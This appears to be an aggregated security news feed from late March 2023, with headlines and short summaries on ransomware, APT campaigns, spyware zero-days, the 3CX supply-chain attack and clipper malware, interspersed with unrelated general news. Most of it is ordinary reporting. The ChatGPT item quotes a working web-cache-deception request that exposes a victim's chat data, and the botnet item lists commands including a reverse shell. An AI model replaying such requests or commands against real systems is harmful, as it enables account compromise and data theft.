                Microsoft has patched a misconfiguration issue impacting the Azure Active Directory (AAD) identity and access management service that exposed several "high-impact" applications to unauthorized access. "One of these apps is a content management system (CMS) that powers Bing.com and allowed us to not only modify search results, but also launch high-impact XSS attacks on Bing users," cloud security

                Autosummary: To make matters worse, the exploit could be weaponized to trigger a cross-site scripting (XSS) attack on Bing.com and extract a victim’s Outlook emails, calendars, Teams messages, SharePoint documents, and OneDrive files.


                Fake ransomware gang targets U.S. orgs with empty data leak threats

                exploits ransomware
                2023-04-01 https://www.bleepingcomputer.com/news/security/fake-ransomware-gang-targets-us-orgs-with-empty-data-leak-threats/
                Fake extortionists are piggybacking on data breaches and ransomware incidents, threatening U.S. companies with publishing or selling allegedly stolen data unless they get paid. [...]

                Autosummary: It is unclear how victims are selected, but one possibility is from publicly available sources, such as the initial attacker’s data leak site, social media, news reports, or company disclosures. Such incidents echo the activity of an extortion group that in 2017 sent DDoS threats to thousands of companies under the names of infamous hacker groups at the time (e.g. New World Hackers, Lizard Squad, LulzSec, Fancy Bear, and Anonymous).


                CISA adds bugs exploited by commercial surveillance spyware to Known Exploited Vulnerabilities catalog

                exploits
                2023-04-01 https://securityaffairs.com/144315/breaking-news/cisa-known-exploited-vulnerabilities-catalog-spyware-bugs.html

                CISA has added nine flaws to its Known Exploited Vulnerabilities catalog, including bugs exploited by commercial spyware on mobile devices. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added nine new vulnerabilities to its Known Exploited Vulnerabilities Catalog. Five of the issues added by CISA to its catalog are part of the exploits used by surveillance […]

                The post CISA adds bugs exploited by commercial surveillance spyware to Known Exploited Vulnerabilities catalog appeared first on Security Affairs.


                Autosummary: CVE-2022-38181 – Arm Mali GPU Kernel Driver Use-After-Free Vulnerability; CVE-2023-0266 – Linux Kernel Use-After-Free Vulnerability; CVE-2022-3038 – Google Chrome Use-After-Free Vulnerability; CVE-2022-22706 – Arm Mali GPU Kernel Driver Unspecified Vulnerability.


                LockBit leaks data stolen from the South Korean National Tax Service

                ransomware
                2023-04-01 https://securityaffairs.com/144342/cyber-crime/lockbit-south-korean-national-tax-service.html

                The LockBit ransomware gang announced the publishing of data stolen from the South Korean National Tax Service. On March 29, 2023, the LockBit ransomware gang announced the hack of the South Korean National Tax Service. The group added the South Korean agency to its Tor leak site and announced the release of stolen data […]

                The post LockBit leaks data stolen from the South Korean National Tax Service appeared first on Security Affairs.




                Russian APT group Winter Vivern targets email portals of NATO and diplomats

                rusia-ucrania
                2023-03-31 https://securityaffairs.com/144263/intelligence/winter-vivern-email-portals-nato.html

                Russian hacking group Winter Vivern has been actively exploiting Zimbra flaws to steal the emails of NATO and diplomats. A Russian hacking group, tracked as Winter Vivern (aka TA473), has been actively exploiting vulnerabilities (CVE-2022-27926) in unpatched Zimbra instances to gain access to the emails of NATO officials, governments, military personnel, and diplomats. The CVE-2022-27926 flaw […]

                The post Russian APT group Winter Vivern targets email portals of NATO and diplomats appeared first on Security Affairs.




                10-year-old Windows bug with "opt-in" fix exploited in 3CX attack

                exploits
                2023-03-31 https://www.bleepingcomputer.com/news/microsoft/10-year-old-windows-bug-with-opt-in-fix-exploited-in-3cx-attack/
                A 10-year-old Windows vulnerability is still being exploited in attacks to make it appear that executables are legitimately signed, with the fix from Microsoft still "opt-in" after all these years. Even worse, the fix is removed after upgrading to Windows 11. [...]

                Autosummary: To enable the fix, Windows users on 64-bit systems can make the following Registry changes:

                Windows Registry Editor Version 5.00
                [HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Wintrust\Config]
                "EnableCertPaddingCheck"="1"
                [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Cryptography\Wintrust\Config]
                "EnableCertPaddingCheck"="1"

                Once these Registry keys are enabled, you can see how differently Microsoft validates the signature in the malicious d3dcompiler_47.dll DLL used in the 3CX supply chain attack.


                Consumer lender TMX discloses data breach impacting 4.8 million people

                financial
                2023-03-31 https://www.bleepingcomputer.com/news/security/consumer-lender-tmx-discloses-data-breach-impacting-48-million-people/
                TMX Finance and its subsidiaries TitleMax, TitleBucks, and InstaLoan have collectively disclosed a data breach that exposed the personal data of 4,822,580 customers. [...]



                Hack the Pentagon website promotes the benefits of bug bounties to US Military

                exploits
                2023-03-31 https://www.bitdefender.com/blog/hotforsecurity/hack-the-pentagon-website-promotes-the-benefits-of-bug-bounties-to-us-military/
                My guess is that if you stumbled across a website that called itself "Hack the Pentagon" and was decorated with a grisly-looking skull, you would probably think that you might be somewhere less than legitimate. After all, normally if you hacked The Pentagon you would find yourself in heaps of trouble. Read more in my article on the Hot for Security blog.



                Winter Vivern APT Targets European Government Entities with Zimbra Vulnerability

                exploits government
                2023-03-31 https://thehackernews.com/2023/03/winter-vivern-apt-targets-european.html
                The advanced persistent threat (APT) actor known as Winter Vivern is now targeting officials in Europe and the U.S. as part of an ongoing cyber espionage campaign. "TA473 since at least February 2023 has continuously leveraged an unpatched Zimbra vulnerability in publicly facing webmail portals that allows them to gain access to the email mailboxes of government entities in Europe," Proofpoint

                Autosummary: The findings come amid revelations that at least three Russian intelligence agencies, including FSB, GRU (linked to Sandworm), and SVR (linked to APT29), likely use software and hacking tools developed by a Moscow-based IT contractor named NTC Vulkan.


                Cyber Police of Ukraine Busted Phishing Gang Responsible for $4.33 Million Scam

                financial
                2023-03-31 https://thehackernews.com/2023/03/cyber-police-of-ukraine-busted-phishing.html
                The Cyber Police of Ukraine, in collaboration with law enforcement officials from Czechia, has arrested several members of a cybercriminal gang that set up phishing sites to target European users. Two of the apprehended affiliates are believed to be organizers, with 10 others detained in other territories across the European Union. The suspects are alleged to have created more than 100 phishing



                Hackers exploit bug in Elementor Pro WordPress plugin with 11M installs

                exploits
                2023-03-31 https://www.bleepingcomputer.com/news/security/hackers-exploit-bug-in-elementor-pro-wordpress-plugin-with-11m-installs/
                Hackers are actively exploiting a high-severity vulnerability in the popular Elementor Pro WordPress plugin used by over eleven million websites. [...]



                Hackers are actively exploiting a flaw in the Elementor Pro WordPress plugin

                exploits
                2023-03-31 https://securityaffairs.com/144290/hacking/elementor-pro-wordpress-plugin-critical-bug.html

                Threat actors are actively exploiting a high-severity flaw in the Elementor Pro WordPress plugin used by more than eleven million websites. WordPress security firm PatchStack warns of a high-severity vulnerability in the Elementor Pro WordPress plugin that is currently being exploited by threat actors in the wild. Elementor Pro is a paid plugin that is currently installed on […]

                The post Hackers are actively exploiting a flaw in the Elementor Pro WordPress plugin appeared first on Security Affairs.



                3 tips for creating backups your organization can rely on when ransomware strikes

                exploits ransomware
                2023-03-31 https://www.malwarebytes.com/blog/news/2023/03/3-tips-for-creating-backups-your-organization-can-rely-on-when-ransomware-strikes

                Categories: News

                Categories: Ransomware

                Tags: World Backup Day

                Backups are your last line of defense against ransomware, if they work.


                The post 3 tips for creating backups your organization can rely on when ransomware strikes appeared first on Malwarebytes Labs.


                Autosummary: The lesson of the Northshore attack and many others is that it's vital to keep at least one recent copy of your data offsite and offline, beyond the reach of an attacker who has domain administrator access to your network. CISA recommends the tried and tested 3-2-1 rule of backups: 3 copies of your data, on 2 different media, with 1 held offsite, which provides resilience against a range of different risks, including ransomware. Without effective backups, Kacoroski was left with a mountain to climb: “It started to really sink in that I’m going to have to rebuild 180 Windows servers, and more importantly, rebuild Active Directory from scratch, with all those accounts and groups, and everything in it.”


                BreachLock API Penetration Testing Service prevents exploits of unpatched APIs

                exploits
                2023-03-30 https://www.helpnetsecurity.com/2023/03/30/breachlock-api-penetration-testing-service/

                BreachLock has launched its API Penetration Testing Service, making API security testing more affordable compared to alternative pentesting providers. The company is best known for its human-led, AI-enabled Pen Testing as a Service (PTaaS) solution delivered via its client portal. API penetration testing will help organizations prevent cybercriminals from exploiting unpatched API vulnerabilities to perpetrate cybercrimes. BreachLock is known for its innovative pentesting approach as a leader in the emerging PTaaS market. With a global … More

                The post BreachLock API Penetration Testing Service prevents exploits of unpatched APIs appeared first on Help Net Security.



                Jair Bolsonaro returning to Brazil for first time since 8 January riots

                latam industry
                2023-03-30 https://www.bbc.co.uk/news/world-latin-america-65120313?at_medium=RSS&at_campaign=KARANGA
                The far-right ex-leader has not been home since supporters stormed government buildings in January.



                US sends million-dollar scammer to prison for four years

                financial
                2023-03-30 https://www.bitdefender.com/blog/hotforsecurity/us-sends-million-dollar-scammer-to-prison-for-four-years/
                31-year-old Solomon Ekunke Okpe, of Lagos, was a member of a gang that devised and executed a variety of scams - including business email compromise (BEC), romance scams, working-from-home scams, and more - between December 2011 and January 2017. Read more in my article on the Hot for Security blog.



                The rise of biometrics and decentralized identity is a game-changer for identity verification

                industry
                2023-03-30 https://www.helpnetsecurity.com/2023/03/30/biometrics-decentralized-identity-verification-video/

                The journey towards digital transformation for organizations and governments has been fraught with difficulties, resulting in some users needing to catch up as more digital services are introduced. In this Help Net Security video, Jenn Markey, VP of Payments and Identities at Entrust, talks about how biometrics, hybrid solutions, and decentralized identity are transforming the industry and the future of identity verification. Digital identity is a rapidly evolving space, with the market expected to reach … More

                The post The rise of biometrics and decentralized identity is a game-changer for identity verification appeared first on Help Net Security.



                Scan and diagnose your SME’s cybersecurity with expert recommendations from ENISA

                ciber
                2023-03-30 https://www.helpnetsecurity.com/2023/03/30/enisa-scan-diagnose-sme-cybersecurity/

                The release of a cybersecurity maturity assessment tool by the European Union Agency for Cybersecurity (ENISA) aims to provide Small and Medium Enterprises (SMEs) with a valuable resource for enhancing their security posture. As a significant driver for innovation and growth in the EU, SMEs constantly face cybersecurity challenges. This is why it is essential to support them in addressing these challenges and identifying improvements. The cybersecurity maturity assessment tool designed by ENISA supports those … More

                The post Scan and diagnose your SME’s cybersecurity with expert recommendations from ENISA appeared first on Help Net Security.



                Mexico opens homicide investigation into deadly fire at migrant centre

                latam
                2023-03-30 https://www.bbc.co.uk/news/world-latin-america-65120624?at_medium=RSS&at_campaign=KARANGA
                Prosecutors open a homicide investigation after a fire at a migrant detention centre kills 38 people.



                3CX customers targeted via trojanized desktop app

                exploits
                2023-03-30 https://www.helpnetsecurity.com/2023/03/30/3cx-trojanized-app/

                Suspected state-sponsored threat actors have trojanized the official Windows desktop app of the widely used 3CX softphone solution, a number of cybersecurity companies began warning on Wednesday.

                What is 3CX?

                3CX is Voice over Internet Protocol (VoIP) private automatic branch exchange (PABX) software that provides video conferencing and live chat capabilities. 3CX offers a Windows, macOS, Linux, Android and iOS version of the app, a Chrome extension, and the PWA (progressive web app) version so … More

                The post 3CX customers targeted via trojanized desktop app appeared first on Help Net Security.

                Autosummary: In the meantime, potentially affected customers should know that the malicious apps:
                contacted various C2 servers;
                retrieved a second-stage payload hosted on a public GitHub repository, which then
                downloaded info-stealing malware capable of grabbing system information, and data and stored login credentials from user profiles on Chrome, Edge, Brave, and Firefox browsers.


                AlienFox Malware Targets API Keys and Secrets from AWS, Google, and Microsoft Cloud Services

                exploits
                2023-03-30 https://thehackernews.com/2023/03/alienfox-malware-targets-api-keys-and.html
                A new "comprehensive toolset" called AlienFox is being distributed on Telegram as a way for threat actors to harvest credentials from API keys and secrets from popular cloud service providers. "The spread of AlienFox represents an unreported trend towards attacking more minimal cloud services, unsuitable for crypto mining, in order to enable and expand subsequent campaigns," SentinelOne security

                Autosummary: Attacks involving AlienFox are said to be opportunistic, with the scripts capable of gathering sensitive data pertaining to AWS, Bluemail, Exotel, Google Workspace, Mailgun, Mandrill, Microsoft 365, Sendgrid, Twilio, Zimbra, and Zoho.


                Bolsonaro touches down in Brazil after self-imposed exile

                latam
                2023-03-30 https://www.bbc.co.uk/news/world-latin-america-65121945?at_medium=RSS&at_campaign=KARANGA
                It is the far-right ex-leader's first time back in Brazil since his supporters stormed Congress.



                $3.5m plan to move Colombian drug lord’s hippos

                latam
                2023-03-30 https://www.bbc.co.uk/news/world-latin-america-65124063?at_medium=RSS&at_campaign=KARANGA
                Pablo Escobar imported hippos to Colombia in the 1980s, but they now pose a growing problem.



                NHS Highland reprimand for HIV patient email data breach

                financial
                2023-03-30 https://www.bbc.co.uk/news/uk-scotland-highlands-islands-65122951?at_medium=RSS&at_campaign=KARANGA
                An error by NHS Highland led to all recipients of an email being able to see personal addresses.



                Ransomware gangs are exploiting IBM Aspera Faspex RCE flaw (CVE-2022-47986)

                exploits
                2023-03-30 https://www.helpnetsecurity.com/2023/03/30/exploiting-cve-2022-47986/

                Attackers are exploiting a critical vulnerability (CVE-2022-47986) in the IBM Aspera Faspex centralized file transfer solution to breach organizations.

                About CVE-2022-47986

                IBM Aspera Faspex is used by organizations to allow employees to quickly and securely exchange files with each other. (The files are uploaded to and downloaded from a centralized Aspera transfer server.) CVE-2022-47986 is a YAML deserialization flaw that can be triggered by remote attackers sending a specially crafted obsolete API call. It affects … More

                The post Ransomware gangs are exploiting IBM Aspera Faspex RCE flaw (CVE-2022-47986) appeared first on Help Net Security.

                Autosummary: In early March, SentinelOne researchers spotted attackers wielding the IceFire ransomware hitting Linux boxes of organizations in Turkey, Iran, Pakistan, and the United Arab Emirates.


                New Mélofée Linux malware linked to Chinese APT groups

                exploits
                2023-03-30 https://securityaffairs.com/144210/apt/melofee-malware-linked-to-china.html

                Exatrack researchers warn of an unknown China-linked hacking group that has been linked to a new Linux malware, dubbed Mélofée. Cybersecurity researchers from ExaTrack recently discovered a previously undetected malware family, dubbed Mélofée, targeting Linux servers. The researchers linked this malware with high confidence to China-linked APT groups, in particular the Winnti group. The Mélofée malware includes a […]

                The post New Mélofée Linux malware linked to Chinese APT groups appeared first on Security Affairs.

                Autosummary: Below is the evidence collected by the researchers that links Mélofée implants to China state-sponsored activity:
                Some of the servers were tracked by our Cyber Threat Intelligence as ShadowPad C&C servers;
                Other servers were linked to both Winnti and HelloBot tools;
                We also saw related domains used as C&C servers for tools like PlugX, Spark, Cobalt Strike, StowAway, and the legitimate toDesk remote control tool;
                Lastly, the attacker also probably used the ezXSS tool, but we could not confirm why.


                Realtek and Cacti flaws now actively exploited by malware botnets

                exploits
                2023-03-30 https://www.bleepingcomputer.com/news/security/realtek-and-cacti-flaws-now-actively-exploited-by-malware-botnets/
                Multiple malware botnets actively target Cacti and Realtek vulnerabilities in campaigns detected between January and March 2023, spreading ShellBot and Moobot malware. [...]

                Autosummary: The first variant establishes communication with the C2 and awaits the reception of one of the following commands:
                ps – perform a port scan on the specified target and port
                nmap – perform a Nmap port scan on a specified port range
                rm – delete files and folders
                version – send version information
                down – download a file
                udp – initiate UDP DDoS attack
                back – inject reverse shell


                Clipboard-injecting malware disguises itself as Tor browser, steals cryptocurrency

                exploits
                2023-03-30 https://grahamcluley.com/clipboard-injecting-malware-disguises-itself-as-tor-browser-steals-cryptocurrency/
                Malware, disguised as copies of Tor, has stolen approximately US $400,000 worth of cryptocurrency from almost 16,000 users worldwide.

                Autosummary: I was amused to see the team at Kaspersky suggest a simple method to check whether your system was compromised: Type or copy the following “Bitcoin address” in Notepad: bc1heymalwarehowaboutyoureplacethisaddress. Now press Ctrl+C and Ctrl+V. If the address changes to something else — the system is likely compromised by a clipboard-injector type of malware, and is dangerous to use.


                Researchers Detail Severe "Super FabriXss" Vulnerability in Microsoft Azure SFX

                exploits
                2023-03-30 https://thehackernews.com/2023/03/researchers-detail-severe-super.html
                Details have emerged about a now-patched vulnerability in Azure Service Fabric Explorer (SFX) that could lead to unauthenticated remote code execution. Tracked as CVE-2023-23383 (CVSS score: 8.2), the issue has been dubbed "Super FabriXss" by Orca Security, a nod to the FabriXss flaw (CVE-2022-35829, CVSS score: 6.2) that was fixed by Microsoft in October 2022. "The Super FabriXss vulnerability



                Winter Vivern hackers exploit Zimbra flaw to steal NATO emails

                exploits
                2023-03-30 https://www.bleepingcomputer.com/news/security/winter-vivern-hackers-exploit-zimbra-flaw-to-steal-nato-emails/
                A Russian hacking group tracked as TA473, aka "Winter Vivern," has been actively exploiting vulnerabilities in unpatched Zimbra endpoints since February 2023 to steal the emails of NATO officials, governments, military personnel, and diplomats. [...]

                Autosummary: [Figure: Complete attack chain (Proofpoint)] "These CSRF JavaScript code blocks are executed by the server that hosts a vulnerable webmail instance," explains Proofpoint in the report. "Further, this JavaScript replicates and relies on emulating the JavaScript of the native webmail portal to return key web request details that indicate the username, password, and CSRF token of targets."


                CISA orders agencies to patch bugs exploited to drop spyware

                exploits
                2023-03-30 https://www.bleepingcomputer.com/news/security/cisa-orders-agencies-to-patch-bugs-exploited-to-drop-spyware/
                The Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies today to patch a set of security vulnerabilities exploited as zero-days in recent attacks to install commercial spyware on mobile devices. [...]



                Cynerio and Sodexo join forces to address growing threats to medical IoT devices

                industry
                2023-03-30 https://www.helpnetsecurity.com/2023/03/31/cynerio-sodexo/

                Cynerio has formed a partnership with Sodexo to provide hospitals and healthcare systems with visibility into their IoMT footprint that allows for the immediate remediation of identified threats through step-by-step mitigation recommendations for each attack and risk. The Cynerio partnership with Sodexo HTM provides healthcare organizations with the threat intelligence they need to compile a precise inventory of all network-connected medical and enterprise IoT devices on the network. This inventory is then evaluated for potential … More

                The post Cynerio and Sodexo join forces to address growing threats to medical IoT devices appeared first on Help Net Security.



                Super FabriXss vulnerability in Microsoft Azure SFX could lead to RCE

                exploits
                2023-03-30 https://securityaffairs.com/144251/hacking/azure-service-fabric-explorer-super-fabrixss.html

                Researchers shared details about a flaw, dubbed Super FabriXss, in Azure Service Fabric Explorer (SFX) that could lead to unauthenticated remote code execution. Researchers from Orca Security shared details about a new vulnerability, dubbed Super FabriXss (CVE-2023-23383 – CVSS score: 8.2), in Azure. The experts demonstrated how to escalate a reflected XSS vulnerability in Azure Service […]

                The post Super FabriXss vulnerability in Microsoft Azure SFX could lead to RCE appeared first on Security Affairs.



                Update now! Apple fixes actively exploited vulnerability and introduces new features

                exploits
                2023-03-30 https://www.malwarebytes.com/blog/news/2023/03/update-now-apple-fixes-actively-exploited-vulnerability-and-introduces-new-features

                Categories: Apple

                Categories: Exploits and vulnerabilities

                Categories: News

                Tags: macOS

                Tags: iOS

                Tags: iPadOS

                Tags: watchOS

                Tags: tvOS

                Tags: Studio Display

                Tags: CVE-2023-23529

                Tags: type confusion

                Tags: emoji

                Apple has released security updates and new features for several of its products, including a fix for an actively exploited vulnerability.


                The post Update now! Apple fixes actively exploited vulnerability and introduces new features appeared first on Malwarebytes Labs.


                Autosummary: "This update introduces 21 new emoji and includes other enhancements, bug fixes, and security updates for your iPad."


                Government sets out "adaptable" regulation for AI

                government
                2023-03-29 https://www.bbc.co.uk/news/technology-65102210?at_medium=RSS&at_campaign=KARANGA
                It proposes a set of principles for the "responsible use" of the tech, which is worth £3.7bn to the UK economy.



                How cybersecurity decision-makers perceive cyber resilience

                ciber
                2023-03-29 https://www.helpnetsecurity.com/2023/03/29/how-cybersecurity-decision-makers-perceive-cyber-resilience-video/

                In an economic climate that puts immense pressure on business leaders to prove ROI and team efficiency, a new report from Immersive Labs looks into the lack of confidence cyber leaders have in their team’s preparation and abilities to combat cyber incidents. In this Help Net Security video, Max Vetter, VP of Cyber at Immersive Labs, discusses the growing pressure on cybersecurity teams to prove their readiness for new and emerging threats.

                The post How cybersecurity decision-makers perceive cyber resilience appeared first on Help Net Security.



                Argentina 7-0 Curacao: Lionel Messi hat-trick as he passes 100 international goals

                latam
                2023-03-29 https://www.bbc.co.uk/sport/football/65108739?at_medium=RSS&at_campaign=KARANGA
                Lionel Messi moves up to 102 international goals with a seventh hat-trick for Argentina in a 7-0 friendly win at home to Curacao.



                Trojanized TOR Browser Installers Spreading Crypto-Stealing Clipper Malware

                exploits
                2023-03-29 https://thehackernews.com/2023/03/trojanized-tor-browser-installers.html
                Trojanized installers for the TOR anonymity browser are being used to target users in Russia and Eastern Europe with clipper malware designed to siphon cryptocurrencies since September 2022. "Clipboard injectors [...] can be silent for years, show no network activity or any other signs of presence until the disastrous day when they replace a crypto wallet address," Vitaly Kamluk, director of

                Autosummary: The Russian cybersecurity firm said it recorded roughly 16,000 detections, of which a majority are registered in Russia and Ukraine, followed by the U.S., Germany, Uzbekistan, Belarus, China, the Netherlands, the U.K., and France.


                Google finds more Android, iOS zero-days used to install spyware

                exploits
                2023-03-29 https://www.bleepingcomputer.com/news/security/google-finds-more-android-ios-zero-days-used-to-install-spyware/
                Google's Threat Analysis Group (TAG) discovered several exploit chains using Android, iOS, and Chrome zero-day and n-day vulnerabilities to install commercial spyware and malicious apps on targets' devices. [...]

                Autosummary: Targets from United Arab Emirates (UAE) were redirected to exploit pages identical to the ones created by the Variston mercenary spyware vendor for its Heliconia exploitation framework and targeting a long list of flaws, including:
                CVE-2022-4262 - Chrome type confusion vulnerability (zero-day at time of exploitation)
                CVE-2022-3038 - Chrome sandbox escape
                CVE-2022-22706 - Mali GPU Kernel Driver vulnerability providing system access and patched in January 2022 (not addressed in Samsung firmware at the time of the attacks)
                CVE-2023-0266 - Linux kernel sound subsystem race condition vulnerability that gives kernel read and write access (zero-day at time of exploitation)


                Spyware Vendors Caught Exploiting Zero-Day Vulnerabilities on Android and iOS Devices

                exploits
                2023-03-29 https://thehackernews.com/2023/03/spyware-vendors-caught-exploiting-zero.html
                A number of zero-day vulnerabilities that were addressed last year were exploited by commercial spyware vendors to target Android and iOS devices, Google's Threat Analysis Group (TAG) has revealed. The two distinct campaigns were both limited and highly targeted, taking advantage of the patch gap between the release of a fix and when it was actually deployed on the targeted devices. "These

                Autosummary: The second campaign, observed in December 2022, consisted of several zero-days and n-days targeting the latest version of Samsung Internet Browser, with the exploits delivered as one-time links via SMS to devices located in the U.A.E.


                Mélofée: Researchers Uncover New Linux Malware Linked to Chinese APT Groups

                exploits
                2023-03-29 https://thehackernews.com/2023/03/melofee-researchers-uncover-new-linux.html
                An unknown Chinese state-sponsored hacking group has been linked to a novel piece of malware aimed at Linux servers. French cybersecurity firm ExaTrack, which found three samples of the previously documented malicious software that date back to early 2022, dubbed it Mélofée. One of the artifacts is designed to drop a kernel-mode rootkit that's based on an open source project referred to as

                Autosummary: Mélofée's features are no different from other backdoors of its kind, enabling it to contact a remote server and receive instructions that allow it to carry out file operations, create sockets, launch a shell, and execute arbitrary commands.


                Google TAG shares details about exploit chains used to install commercial spyware

                exploits
                2023-03-29 https://securityaffairs.com/144174/hacking/exploit-chains-zero-day-spyware.html

                Google’s Threat Analysis Group (TAG) discovered several exploit chains targeting Android, iOS, and Chrome to install commercial spyware. Google’s Threat Analysis Group (TAG) shared details about two distinct campaigns which used several zero-day exploits against Android, iOS and Chrome. The experts pointed out that both campaigns were limited and highly targeted. The threat actors behind […]

                The post Google TAG shares details about exploit chains used to install commercial spyware appeared first on Security Affairs.

                Autosummary: The exploit chain included the following 0-days and n-days: CVE-2022-4262, a type confusion vulnerability in Chrome fixed in December 2022 (0-day at time of exploitation) – similar to CVE-2022-1134.


                Clipper attacks use Trojanized TOR Browser installers

                exploits
                2023-03-29 https://securityaffairs.com/144158/hacking/tor-browser-installers-clipper.html

                Researchers discovered malware-laced installers for the TOR browser that are spreading clipper malware in Russia and Eastern Europe. Kaspersky researchers discovered a Trojanized version of the Tor Browser that is spreading clipper malware in Russia and Eastern Europe. The attackers take advantage of the fact that the official Tor Project has been banned in […]

                The post Clipper attacks use Trojanized TOR Browser installers appeared first on Security Affairs.

                Autosummary: Below are the top 10 affected countries: Russia, Ukraine, United States, Germany, Uzbekistan, Belarus, China, Netherlands, United Kingdom, France. Kaspersky analyzed the cryptowallet replacement addresses and determined that the threat actors behind the attacks have earned almost $381K worth of Bitcoin, $10K in Litecoin, and $5K in Ether.


                Video of deadly fire at Mexico migrant centre causes outrage

                latam
                2023-03-29 https://www.bbc.co.uk/news/world-latin-america-65111258?at_medium=RSS&at_campaign=KARANGA
                Footage emerges which appears to show officers failing to open a cell door as the fire erupted.

                Autosummary: "


                SafeMoon ‘burn’ bug abused to drain $8.9 million from liquidity pool

                exploits
                2023-03-29 https://www.bleepingcomputer.com/news/cryptocurrency/safemoon-burn-bug-abused-to-drain-89-million-from-liquidity-pool/
                The SafeMoon token liquidity pool lost $8.9 million after a hacker exploited a newly created "burn" smart contract function that artificially inflated the price, allowing the actors to sell SafeMoon at a much higher price. [...] "

                Autosummary: "Hey relax, we accidentally front-ran an attack against you, we would like to return the fund, setup secure communication channel, let's talk," said a comment added to the transaction. "


                OpenAI quickly fixed account takeover bugs in ChatGPT

                exploits
                2023-03-29 https://securityaffairs.com/144184/hacking/chatgpt-account-takeover-bugs.html

                OpenAI addressed multiple severe vulnerabilities in the popular chatbot ChatGPT that could have been exploited to take over accounts. OpenAI addressed multiple severe vulnerabilities in ChatGPT that could have allowed attackers to take over user accounts and view chat histories. One of the issues was a reported “Web Cache Deception” vulnerability that could lead to […]

                The post OpenAI quickly fixed account takeover bugs in ChatGPT appeared first on Security Affairs.

                "

                Autosummary: “GET /backend-api/conversations%0A%0D-testtest.css?offset=0&limit=20 Send it to a victim, and upon accessing it – his own “API” response will be cached, and if you recheck the same URL (i.e. fetching the cached response of the victim), you will be able to see the victim’s HTTP response, which contains the conversations’ titles,” explained the expert Ayoub Fathi (@_ayoubfathi_) on Twitter on March 25, 2023. "


                Colombian soldiers killed in attack blamed on ELN rebels

                latam
                2023-03-29 https://www.bbc.co.uk/news/world-latin-america-65111259?at_medium=RSS&at_campaign=KARANGA
                At least nine soldiers are dead after a mortar attack on an army base in Colombia's north-east. "

                Autosummary: "


                Cybersecurity firms warn of 3CX desktop app supply chain attack

                ciber
                2023-03-29 https://www.bleepingcomputer.com/news/security/cybersecurity-firms-warn-of-3cx-desktop-app-supply-chain-attack/
                A digitally signed and trojanized version of the 3CX Voice Over Internet Protocol (VOIP) desktop client is reportedly being used to target the company's customers in an ongoing supply chain attack. [...] "

                Autosummary: The company's customer list includes a long list of high-profile companies and organizations like American Express, Coca-Cola, McDonald's, BMW, Honda, AirFrance, NHS, Toyota, Mercedes-Benz, IKEA, and Holiday Inn. "


                Smashing Security podcast #315: Crypto hacker hijinks, government spyware, and Utah social media shocker

                government
                2023-03-29 https://grahamcluley.com/smashing-security-podcast-315/
                A cryptocurrency hack leads us down a maze of twisty little passages, Joe Biden's commercial spyware bill, and Utah gets tough on social media sites. All this and much much more is discussed in the latest edition of the "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by The Register's Iain Thomson. "

                Autosummary: Hosts: Graham Cluley (@gcluley) and Carole Theriault (@caroletheriault). Guest: Iain Thomson (@iainthomson). Sponsored by Bitwarden. "


                Anomali and Canon IT join forces to combat zero-day threats

                exploits
                2023-03-29 https://www.helpnetsecurity.com/2023/03/30/anomali-canon-it/

                Anomali and Canon IT Solutions have announced the availability of the Canon IT Solutions “Threat Intelligence Platform,” a security operations service that operationalizes threat intelligence to better detect and respond to attacks. Utilizing Anomali ThreatStream, the service provides small and medium-sized enterprises with actionable intelligence on cyber attackers, trending tactics and information-based security measures that let Canon IT Solutions customers know if they are vulnerable to attacks, and how to protect against the latest cyber … More

                The post Anomali and Canon IT join forces to combat zero-day threats appeared first on Help Net Security.

                "

                Autosummary: "


                Spera raises $10 million to equip cybersecurity teams with the visibility and risk contextualization

                ciber
                2023-03-29 https://www.helpnetsecurity.com/2023/03/30/spera-funding/

                Spera has revealed $10 million in seed funding led by YL Ventures, with participation from notable security and go-to-market leaders, prominent angel investors and serial entrepreneurs from leading enterprises including Google, Palo Alto Networks, Akamai, Zendesk, Zscaler and others. Founded by cybersecurity veterans Dor Fledel, CEO and Ariel Kadyshevitch, CTO, Spera is the Identity Security Posture Management solution delivering end-to-end identity attack surface management, risk reduction and identity threat prevention, detection and response. According to … More

                The post Spera raises $10 million to equip cybersecurity teams with the visibility and risk contextualization appeared first on Help Net Security.

                "

                Autosummary: Founded by cybersecurity veterans Dor Fledel, CEO and Ariel Kadyshevitch, CTO, Spera is the Identity Security Posture Management solution delivering end-to-end identity attack surface management, risk reduction and identity threat prevention, detection and response. "


                Right-Hand Cybersecurity raises $5 million to expand its global operations

                ciber
                2023-03-29 https://www.helpnetsecurity.com/2023/03/30/right-hand-cybersecurity-funding/

                Right-Hand Cybersecurity has unveiled its successful $5M Series A led by former PayPal executive Jack Selby and his firm AZ-VC. With the successful close of its Series A round, Right-Hand will expand its operations across the US and Asia-Pacific while investing heavily in its Human Risk Management platform that integrates with other commonly adopted and relied upon security solutions. Right-Hand takes a human-centered approach to cybersecurity that improves employee behaviors in real-time that are otherwise … More

                The post Right-Hand Cybersecurity raises $5 million to expand its global operations appeared first on Help Net Security.

                "

                Autosummary: Right-Hand’s Human Risk Management platform aggregates employee security behaviors and alerts in real-time from its existing platform, and other market Endpoint Detection & Response (EDR), Email Security and Identity and Access Management (IAM) technologies, and assigns different behaviors a risk score that can be easily interpreted among key stakeholders to gain visibility into employee risk in plain business terms. "


                QNAP fixed Sudo privilege escalation bug in NAS devices

                exploits
                2023-03-29 https://securityaffairs.com/144200/security/qnap-sudo-flaw.html

                Taiwanese vendor QNAP warns customers to patch a high-severity Sudo privilege escalation bug affecting NAS devices. Taiwanese vendor QNAP warns customers to update their network-attached storage (NAS) devices to address a high-severity Sudo privilege escalation vulnerability tracked as CVE-2023-22809. The company states that the vulnerability affects QTS, QuTS hero, QuTScloud, and QVP (QVR Pro appliances) […]

                The post QNAP fixed Sudo privilege escalation bug in NAS devices appeared first on Security Affairs.

                "

                Autosummary: The company already fixed the flaw in the following operating system versions: QTS 5.0.1.2346 build 20230322 and later, and QuTS hero h5.0.1.2348 build 20230324 and later. “QNAP is urgently fixing the vulnerabilities in QuTScloud and QVP.” "


                Australia’s Casino Giant Crown Resorts disclosed data breach after Clop ransomware attack

                financial exploits ransomware
                2023-03-29 https://securityaffairs.com/144193/data-breach/crown-resorts-clop-ransomware.html

